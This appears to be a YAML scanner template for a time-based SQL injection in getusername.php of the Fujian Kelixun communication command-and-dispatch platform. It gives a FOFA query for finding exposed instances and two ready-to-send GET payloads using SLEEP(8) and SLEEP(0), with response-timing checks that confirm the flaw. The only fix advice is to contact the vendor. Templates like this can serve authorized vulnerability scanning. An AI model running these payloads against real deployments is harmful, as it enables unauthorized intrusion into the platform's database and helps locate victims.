product: 福建科立迅通信指挥调度平台
vName: 福建科立迅通信指挥调度平台 getusername.php SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 福建科立迅通信指挥调度平台 getusername.php SQL注入
version: ''
note: ''
search:
  FOFA: app="指挥调度管理平台"
protocol: http
link: https://blog.csdn.net/m0_64366018/article/details/135714333
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /api/client/getusername.php?number=1%20AND%20(SELECT%205443%20FROM%20(SELECT(SLEEP(8)))FIjE)
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: '>='
            num: 8
  - exp:
      method: get
      follow: false
      path: /api/client/getusername.php?number=1%20AND%20(SELECT%205443%20FROM%20(SELECT(SLEEP(0)))FIjE)
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: <=
            num: 7